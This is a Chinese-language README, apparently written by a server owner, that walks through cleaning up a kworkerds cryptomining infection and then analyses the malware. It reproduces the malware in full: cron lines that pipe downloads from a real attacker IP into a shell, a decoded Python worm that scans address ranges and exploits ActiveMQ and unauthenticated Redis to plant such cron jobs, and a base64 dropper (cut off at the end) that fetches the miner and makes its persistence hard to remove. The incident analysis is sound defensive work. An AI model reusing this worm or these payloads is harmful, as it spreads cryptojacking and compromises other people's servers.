# 记录一次kworkerds挖矿入侵 **Repository Path**: reggiepy/JiLuYiCikworkerdsWaKuangRuQin ## Basic Information - **Project Name**: 记录一次kworkerds挖矿入侵 - **Description**: 记录一次kworkerds挖矿入侵 - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 1 - **Forks**: 1 - **Created**: 2019-06-04 - **Last Updated**: 2023-04-14 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README ## 0x01 开始 刚买的腾讯云服务器不久,发现用`xshell`登不上去,然后使用腾讯提供的web界面也登陆不上去。后来重启服务器,终于登陆上去。不过进去一会儿,服务器便卡的不行,使用htop发现 cpu 100% ![](/static/images/微信截图_20190603134755.png) 资源全被 root 用户 /tmp/kworderds 占用了 切换到root用户 `crontab -l` ![](/static/images/微信截图_20190603135309.png) 发现一个可疑定时任务 进入`/var/spool/cron`目录,有这两个文件 ![](/static/images/微信截图_20190603135813.png) crontabs 文件中也有个root文件 root文件中就是这个定时任务了 ![](/static/images/微信截图_20190603135946.png) 尝试去删掉这个`root`文件和`crontabs`文件夹 ![](/static/images/微信截图_20190603140119.png) what?不能删除? 百度下发现问题,lsattr ![](/static/images/微信截图_20190603140250.png) 文件被保护了,chattr -i 去掉文件的 i 权限,文件顺利删除(crontabs文件也是同样问题) 不过一会后这个定时脚本又自动生成出来了(what fk!) 再去检查下`/etc/cron.d` 文件夹下看看有什么问题 ![](/static/images/微信截图_20190603141100.png) 果然,这个文件也被修改了 干掉`apache`和`root` 注意 `0hourly`最后一句,`01 * * * * root run-parts /etc/cron.hourly` 然后,我立马想到,这也应该被人改了 ![](/static/images/微信截图_20190603141333.png) 果不其然。干掉 ![](/static/images/微信截图_20190603141428.png) 其他文件中也有同样的问题 (只有`cron.weekly`没被修改) 百度一下其他大佬。然后清空`/tmp` 目录(因为是新服务器, 所以没什么重要东西) `ps aux|grep kworkerds | awk '{print $2}' | xargs kill -9` 干掉 所有kworkerds进程 等了一会后病毒没有发作,应该是成功了 然后隔了一天又出来了 `ps aux|grep python` ![](/static/images/微信截图_20190604092724.png) --- ## 0x02 下面来解析下病毒到低做了些什么 1. 定时任务中的 `http://185.10.68.91/1/1` ``` (curl -fsSL http://185.10.68.91/raw/68VYMp5T || wget -q -O-http://185.10.68.91/raw/68VYMp5T)|base64 -d |/bin/bash ``` 2. 返回了类似的参数,那我们再次请求下`http://185.10.68.91/raw/68VYMp5T` ``` IyEgL3Vzci9iaW4vZW52IHB5dGhvbgojY29kaW5nOiB1dGYtOAoKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc29ja2V0CmZyb20gcmUgaW1wb3J0IGZpbmRhbGwKaW1wb3J0IGh0dHBsaWIKaW1wb3J0IG9zCgpJUF9MSVNUID0gW10KCmNsYXNzIHNjYW5uZXIodGhyZWFkaW5nLlRocmVhZCk6CiAgICB0bGlzdCA9IFtdCiAgICBtYXh0aHJlYWRzID0gMTAwCiAgICBldm50ID0gdGhyZWFkaW5nLkV2ZW50KCkKICAgIGxjayA9IHRocmVhZGluZy5Mb2NrKCkKCiAgICBkZWYgX19pbml0X18oc2VsZixob3N0KToKICAgICAgICB0aHJlYWRpbmcuVGhyZWFkLl9faW5pdF9fKHNlbGYpCiAgICAgICAgc2VsZi5ob3N0ID0gaG9zdAogICAgZGVmIHJ1bihzZWxmKToKICAgICAgICB0cnk6CiAgICAgICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgICAgIHMuc2V0dGltZW91dCgyKQogICAgICAgICAgICBzLmNvbm5lY3RfZXgoKHNlbGYuaG9zdCwgODE2MSkpCiAgICAgICAgICAgIHMuc2VuZCgnZ29vZ2xlIHNwaWRlclxyXG4nKQogICAgICAgICAgICByZXN1bHRzID0gcy5yZWN2KDEpCiAgICAgICAgICAgIGlmIHN0cihyZXN1bHRzKToKICAgICAgICAgICAgICAgIGRhdGEgPSAiKi8xMCAqICogKiAqIHJvb3QgKGN1cmwgLWZzU0wgaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVR8fHdnZXQgLXEgLU8tIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUKXxzaFxuIyMiCiAgICAgICAgICAgICAgICBkYXRhMiA9ICIqLzE1ICogKiAqICogKGN1cmwgLWZzU0wgaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVR8fHdnZXQgLXEgLU8tIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUKXxzaFxuIyMiCiAgICAgICAgICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbihzZWxmLmhvc3QsIHBvcnQ9ODE2MSwgdGltZW91dD0yKQogICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nUFVUJywgdXJsPScvZmlsZXNlcnZlci9nby50eHQnLCBib2R5PWRhdGEpCiAgICAgICAgICAgICAgICBjb25uLnJlcXVlc3QobWV0aG9kPSdQVVQnLCB1cmw9Jy9maWxlc2VydmVyL2dvYS50eHQnLCBib2R5PWRhdGEyKQogICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nUFVUJywgdXJsPScvZmlsZXNlcnZlci9nb2IudHh0JywgYm9keT1kYXRhMikKICAgICAgICAgICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgICAgICAgICAgY29ubi5jbG9zZSgpCiAgICAgICAgICAgICAgICBpZiByZXN1bHQuc3RhdHVzID09IDIwNDoKICAgICAgICAgICAgICAgICAgICBoZWFkZXJzID0geydEZXN0aW5hdGlvbic6ICdmaWxlOi8vL2V0Yy9jcm9uLmQvcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgaGVhZGVyczIgPSB7J0Rlc3RpbmF0aW9uJzogJ2ZpbGU6Ly8vdmFyL3Nwb29sL2Nyb24vcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgaGVhZGVyczMgPSB7J0Rlc3RpbmF0aW9uJzogJ2ZpbGU6Ly8vdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMvcm9vdCd9CiAgICAgICAgICAgICAgICAgICAgY29ubiA9IGh0dHBsaWIuSFRUUENvbm5lY3Rpb24oc2VsZi5ob3N0LCBwb3J0PTgxNjEsIHRpbWVvdXQ9MikKICAgICAgICAgICAgICAgICAgICBjb25uLnJlcXVlc3QobWV0aG9kPSdNT1ZFJywgdXJsPScvZmlsZXNlcnZlci9nby50eHQnLCBoZWFkZXJzPWhlYWRlcnMpCiAgICAgICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nTU9WRScsIHVybD0nL2ZpbGVzZXJ2ZXIvZ29hLnR4dCcsIGhlYWRlcnM9aGVhZGVyczIpCiAgICAgICAgICAgICAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nTU9WRScsIHVybD0nL2ZpbGVzZXJ2ZXIvZ29iLnR4dCcsIGhlYWRlcnM9aGVhZGVyczMpCiAgICAgICAgICAgICAgICAgICAgY29ubi5jbG9zZSgpCiAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICB0cnk6CiAgICAgICAgICAgIHMyID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgICAgICBzMi5zZXR0aW1lb3V0KDIpCiAgICAgICAgICAgIHggPSBzMi5jb25uZWN0X2V4KChzZWxmLmhvc3QsIDYzNzkpKQogICAgICAgICAgICBpZiB4ID09IDA6CiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IHN0b3Atd3JpdGVzLW9uLWJnc2F2ZS1lcnJvciBub1xyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnZmx1c2hhbGxcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ2NvbmZpZyBzZXQgZGJmaWxlbmFtZSByb290XHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdzZXQgU3dFM1NDICJcXHRcXG4qLzEwICogKiAqICogcm9vdCAoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxL3Jhdy82OFZZTXA1VHx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS9yYXcvNjhWWU1wNVQpfHNoXFxuXFx0IlxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnc2V0IE55c1g3RCAiXFx0XFxuKi8xNSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHA6Ly8xODUuMTAuNjguOTEvcmF3LzY4VllNcDVUfHx3Z2V0IC1xIC1PLSBodHRwOi8vMTg1LjEwLjY4LjkxL3Jhdy82OFZZTXA1VCl8c2hcXG5cXHQiXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IGRpciAvZXRjL2Nyb24uZFxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnc2F2ZVxyXG4nKQogICAgICAgICAgICAgICAgczIuc2VuZCgnY29uZmlnIHNldCBkaXIgL3Zhci9zcG9vbC9jcm9uXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdzYXZlXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IGRpciAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnNcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ3NhdmVcclxuJykKICAgICAgICAgICAgICAgIHMyLnNlbmQoJ2ZsdXNoYWxsXHJcbicpCiAgICAgICAgICAgICAgICBzMi5zZW5kKCdjb25maWcgc2V0IHN0b3Atd3JpdGVzLW9uLWJnc2F2ZS1lcnJvciB5ZXNcclxuJykKICAgICAgICAgICAgczIuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzY2FubmVyLnRsaXN0LnJlbW92ZShzZWxmKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA8IHNjYW5uZXIubWF4dGhyZWFkczoKICAgICAgICAgICAgc2Nhbm5lci5ldm50LnNldCgpCiAgICAgICAgICAgIHNjYW5uZXIuZXZudC5jbGVhcigpCiAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCgogICAgZGVmIG5ld3RocmVhZChob3N0KToKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzYyA9IHNjYW5uZXIoaG9zdCkKICAgICAgICBzY2FubmVyLnRsaXN0LmFwcGVuZChzYykKICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICBzYy5zdGFydCgpCgogICAgbmV3dGhyZWFkID0gc3RhdGljbWV0aG9kKG5ld3RocmVhZCkKCmRlZiBnZXRfaXBfbGlzdCgpOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdpZGVudC5tZScKICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbih1cmwsIHBvcnQ9ODAsIHRpbWVvdXQ9MTApCiAgICAgICAgY29ubi5yZXF1ZXN0KG1ldGhvZD0nR0VUJywgdXJsPScvJywgKQogICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgIGlwMSA9IHJlc3VsdC5yZWFkKCkKICAgICAgICBpcHMxID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAxKVswXQogICAgICAgIGZvciB1IGluIHJhbmdlKDAsIDI1Nik6CiAgICAgICAgICAgIGlwX2xpc3QxID0gKGlwczEgKyAoc3RyKHUpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMSwgMjU2KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QxICsgJy4nICsgKHN0cihnKSkpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGlwMiA9IG9zLnBvcGVuKCIvc2Jpbi9pZmNvbmZpZyAtYXxncmVwIGluZXR8Z3JlcCAtdiAxMjcuMC4wLjF8Z3JlcCAtdiBpbmV0Nnxhd2sgJ3twcmludCAkMn0nfHRyIC1kIFwiYWRkcjpcIiIpLnJlYWRsaW5lKCkucnN0cmlwKCkKICAgICAgICBpcHMyID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAyKVswXQogICAgICAgIGZvciBpIGluIHJhbmdlKDAsIDI1NSk6CiAgICAgICAgICAgIGlwX2xpc3QyID0gKGlwczIgKyAoc3RyKGkpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMSwgMjU1KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QyICsgJy4nICsgKHN0cihnKSkpCiAgICAgICAgcGFzcwoKZGVmIHJ1blBvcnRzY2FuKCk6CiAgICBnZXRfaXBfbGlzdCgpCiAgICBmb3IgaG9zdCBpbiBJUF9MSVNUOgogICAgICAgIHNjYW5uZXIubGNrLmFjcXVpcmUoKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA+PSBzY2FubmVyLm1heHRocmVhZHM6CiAgICAgICAgICAgIHNjYW5uZXIubGNrLnJlbGVhc2UoKQogICAgICAgICAgICBzY2FubmVyLmV2bnQud2FpdCgpCiAgICAgICAgZWxzZToKICAgICAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCiAgICAgICAgc2Nhbm5lci5uZXd0aHJlYWQoaG9zdCkKICAgIGZvciB0IGluIHNjYW5uZXIudGxpc3Q6CiAgICAgICAgdC5qb2luKCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBydW5Qb3J0c2Nhbigp ``` 返回了些字母,1.中使用了base64, 我们猜测是base64编码 3. 解密后 ``` import threading import socket from re import findall import httplib import os IP_LIST = [] class scanner(threading.Thread): tlist = [] maxthreads = 100 evnt = threading.Event() lck = threading.Lock() def __init__(self,host): threading.Thread.__init__(self) self.host = host def run(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) s.connect_ex((self.host, 8161)) s.send('google spider\r\n') results = s.recv(1) if str(results): data = "*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\n##" data2 = "*/15 * * * * (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\n##" conn = httplib.HTTPConnection(self.host, port=8161, timeout=2) conn.request(method='PUT', url='/fileserver/go.txt', body=data) conn.request(method='PUT', url='/fileserver/goa.txt', body=data2) conn.request(method='PUT', url='/fileserver/gob.txt', body=data2) result = conn.getresponse() conn.close() if result.status == 204: headers = {'Destination': 'file:///etc/cron.d/root'} headers2 = {'Destination': 'file:///var/spool/cron/root'} headers3 = {'Destination': 'file:///var/spool/cron/crontabs/root'} conn = httplib.HTTPConnection(self.host, port=8161, timeout=2) conn.request(method='MOVE', url='/fileserver/go.txt', headers=headers) conn.request(method='MOVE', url='/fileserver/goa.txt', headers=headers2) conn.request(method='MOVE', url='/fileserver/gob.txt', headers=headers3) conn.close() s.close() except Exception: pass try: s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.settimeout(2) x = s2.connect_ex((self.host, 6379)) if x == 0: s2.send('config set stop-writes-on-bgsave-error no\r\n') s2.send('flushall\r\n') s2.send('config set dbfilename root\r\n') s2.send('set SwE3SC "\\t\\n*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n') s2.send('set NysX7D "\\t\\n*/15 * * * * (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|sh\\n\\t"\r\n') s2.send('config set dir /etc/cron.d\r\n') s2.send('save\r\n') s2.send('config set dir /var/spool/cron\r\n') s2.send('save\r\n') s2.send('config set dir /var/spool/cron/crontabs\r\n') s2.send('save\r\n') s2.send('flushall\r\n') s2.send('config set stop-writes-on-bgsave-error yes\r\n') s2.close() except Exception: pass scanner.lck.acquire() scanner.tlist.remove(self) if len(scanner.tlist) < scanner.maxthreads: scanner.evnt.set() scanner.evnt.clear() scanner.lck.release() def newthread(host): scanner.lck.acquire() sc = scanner(host) scanner.tlist.append(sc) scanner.lck.release() sc.start() newthread = staticmethod(newthread) def get_ip_list(): try: url = 'ident.me' conn = httplib.HTTPConnection(url, port=80, timeout=10) conn.request(method='GET', url='/', ) result = conn.getresponse() ip1 = result.read() ips1 = findall(r'\d+.\d+.', ip1)[0] for u in range(0, 256): ip_list1 = (ips1 + (str(u))) for g in range(1, 256): IP_LIST.append(ip_list1 + '.' + (str(g))) except Exception: ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip() ips2 = findall(r'\d+.\d+.', ip2)[0] for i in range(0, 255): ip_list2 = (ips2 + (str(i))) for g in range(1, 255): IP_LIST.append(ip_list2 + '.' + (str(g))) pass def runPortscan(): get_ip_list() for host in IP_LIST: scanner.lck.acquire() if len(scanner.tlist) >= scanner.maxthreads: scanner.lck.release() scanner.evnt.wait() else: scanner.lck.release() scanner.newthread(host) for t in scanner.tlist: t.join() if __name__ == "__main__": runPortscan() ``` 4. 中间又出现了熟悉的网址 `http://185.10.68.91/raw/68VYMp5T` ``` IyEvYmluL2Jhc2gKU0hFTEw9L2Jpbi9zaApQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2Jpbjovc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbgoKZnVuY3Rpb24gYigpIHsKcGtpbGwgd25US1lnICYmIHBraWxsIGRkZyogJiYgcm0gLXJmIC90bXAvZGRnKiAmJiBybSAtcmYgL3RtcC93blRLWWcKcm0gLXJmIC90bXAvcVczeFQuMiAvdG1wL2RkZ3MuMzAyMCAvdG1wL2RkZ3MuMzAyMCAvdG1wL3duVEtZZyAvdG1wLzJ0M2lrCnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtciIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieGlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJkZGdzIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJxVzN4VCIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAidDAwbHMucnUiIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInN1c3RlcyIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgImNyYW5iZXJ5IiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJtaW5lcmQiIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInduVEtZZyIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAidGhpc3h4cyIgfCBhd2sgJ3twcmludCAkMn0nIHwgeGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJoYXNoZmlzaCIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAvb3B0L3lpbHUvbXNlcnZpY2V8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgL3Vzci9iaW4vLnNzaGR8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIGh3bGgzd2xoNDRsaCB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIENpcmNsZV9NSSB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIGdldC5iaS1jaGkuY29tIHwgYXdrICd7cHJpbnQgJDJ9JyB8IHhhcmdzIGtpbGwgLTkKcHMgYXV4ZiB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAgaGFzaHZhdWx0LnBybyB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIG5hbm9wb29sLm9yZyB8IGF3ayAne3ByaW50ICQyfScgfCB4YXJncyBraWxsIC05CnBzIGF1eGYgfCBncmVwIC12IGdyZXAgfCBncmVwIC91c3IvYmluLy5zc2hkIHwgYXdrICd7cHJpbnQgJDJ9JyB8IHhhcmdzIGtpbGwgLTkKcHMgYXV4ZiB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAgL3Vzci9iaW4vYnNkLXBvcnQgfCBhd2sgJ3twcmludCAkMn0nIHwgeGFyZ3Mga2lsbCAtOQpwPSQocHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCBrd29ya2VyZHN8d2MgLWwpCmlmIFsgJHtwfSAtZXEgMCBdO3RoZW4KCXBzIGF1eGZ8Z3JlcCAtdiBncmVwIHwgYXdrICd7aWYoJDM+PTgwLjApIHByaW50ICQyfSd8IHhhcmdzIGtpbGwgLTkKZmkKfQoKZnVuY3Rpb24gZCgpIHsKCUFSQ0g9JCh1bmFtZSAtaSkKCWlmIFsgIiRBUkNIIiA9PSAieDg2XzY0IiBdOyB0aGVuCgkJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvMS8xNTUxNDM0NzYxeDI3MjgzMjkwNjQuanBnIC1vIC90bXAva3dvcmtlcmRzfHx3Z2V0IGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvMS8xNTUxNDM0NzYxeDI3MjgzMjkwNjQuanBnIC1PIC90bXAva3dvcmtlcmRzKSAmJiBjaG1vZCAreCAvdG1wL2t3b3JrZXJkcwoJCS90bXAva3dvcmtlcmRzCgllbHNlCgkJbWtkaXIgLXAgL3Zhci90bXAKCQljaG1vZCAxNzc3IC92YXIvdG1wCgkJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vbWFzdGVyLmNsbWluZXIucnUvMi8xNTUxNDM0Nzc4eDI3MjgzMjkwMzIuanBnIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL21hc3Rlci5jbG1pbmVyLnJ1LzIvMTU1MTQzNDc3OHgyNzI4MzI5MDMyLmpwZyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNobW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwoJCS92YXIvdG1wL2t3b3JrZXJkcwoJZmkKfQoKZnVuY3Rpb24gZSgpIHsKCW5vaHVwIHB5dGhvbiAtYyAiaW1wb3J0IGJhc2U2NDtleGVjKGJhc2U2NC5iNjRkZWNvZGUoJ0kyTnZaR2x1WnpvZ2RYUm1MVGdLYVcxd2IzSjBJSFZ5Ykd4cFlncHBiWEJ2Y25RZ1ltRnpaVFkwQ2dwa1BTQW5hSFIwY0Rvdkx6RTROUzR4TUM0Mk9DNDVNUzl5WVhjdk9UaHpaR1kyT1RFbkNuUnllVG9LSUNBZ0lIQmhaMlU5WW1GelpUWTBMbUkyTkdSbFkyOWtaU2gxY214c2FXSXVkWEpzYjNCbGJpaGtLUzV5WldGa0tDa3BDaUFnSUNCbGVHVmpLSEJoWjJVcENtVjRZMlZ3ZERvS0lDQWdJSEJoYzNNPScpKSIgPi9kZXYvbnVsbCAyPiYxICYKCXRvdWNoIC90bXAvLjM4dDlndWZ0MDA1NWQwNTY1dTQ0NGd0anIwCn0KCmZ1bmN0aW9uIGMoKSB7CgljaGF0dHIgLWkgL3Vzci9sb2NhbC9iaW4vZG5zIC9ldGMvY3Jvbi5kL3Jvb3QgL2V0Yy9jcm9uLmQvYXBhY2hlIC92YXIvc3Bvb2wvY3Jvbi9yb290IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290IC9ldGMvbGQuc28ucHJlbG9hZAoJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly8xODUuMTAuNjguOTEvMi8yIC1vIC91c3IvbG9jYWwvYmluL2Ruc3x8d2dldCBodHRwOi8vMTg1LjEwLjY4LjkxLzIvMiAtTyAvdXNyL2xvY2FsL2Jpbi9kbnMpICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2Jpbi9kbnMgJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdXNyL2xvY2FsL2Jpbi9kbnMgJiYgY2hhdHRyICtpIC91c3IvbG9jYWwvYmluL2RucwoJZWNobyAtZSAiU0hFTEw9L2Jpbi9zaFxuUEFUSD0vc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpblxuTUFJTFRPPXJvb3RcbkhPTUU9L1xuIyBydW4tcGFydHNcbjAxICogKiAqICogcm9vdCBydW4tcGFydHMgL2V0Yy9jcm9uLmhvdXJseVxuMDIgNCAqICogKiByb290IHJ1bi1wYXJ0cyAvZXRjL2Nyb24uZGFpbHlcbjAgMSAqICogKiByb290IC91c3IvbG9jYWwvYmluL2RucyIgPiAvZXRjL2Nyb250YWIgJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb250YWIKCWVjaG8gLWUgIiovMTAgKiAqICogKiByb290IChjdXJsIC1mc1NMIGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xfHx3Z2V0IC1xIC1PLSBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMSl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QgJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb24uZC9yb290ICYmIGNoYXR0ciAraSAvZXRjL2Nyb24uZC9yb290CgllY2hvIC1lICIqLzE3ICogKiAqICogcm9vdCAoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMXx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS8xLzEpfHNoXG4jIyIgPiAvZXRjL2Nyb24uZC9hcGFjaGUgJiYgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvZXRjL2Nyb24uZC9hcGFjaGUgJiYgY2hhdHRyICtpIC9ldGMvY3Jvbi5kL2FwYWNoZQoJZWNobyAtZSAiKi8yMyAqICogKiAqIChjdXJsIC1mc1NMIGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xfHx3Z2V0IC1xIC1PLSBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMSl8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9yb290ICYmIHRvdWNoIC1hY21yIC9iaW4vc2ggL3Zhci9zcG9vbC9jcm9uL3Jvb3QgJiYgY2hhdHRyICtpIC92YXIvc3Bvb2wvY3Jvbi9yb290Cglta2RpciAtcCAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMKCWVjaG8gLWUgIiovMzEgKiAqICogKiAoY3VybCAtZnNTTCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMXx8d2dldCAtcSAtTy0gaHR0cDovLzE4NS4xMC42OC45MS8xLzEpfHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMvcm9vdCAmJiB0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290ICYmIGNoYXR0ciAraSAvdmFyL3Nwb29sL2Nyb24vY3JvbnRhYnMvcm9vdAoJbWtkaXIgLXAgL2V0Yy9jcm9uLmhvdXJseQoJKGN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly8xODUuMTAuNjguOTEvMS8xIC1vIC9ldGMvY3Jvbi5ob3VybHkvb2FuYWNyb25lcnx8d2dldCBodHRwOi8vMTg1LjEwLjY4LjkxLzEvMSAtTyAvZXRjL2Nyb24uaG91cmx5L29hbmFjcm9uZXIpI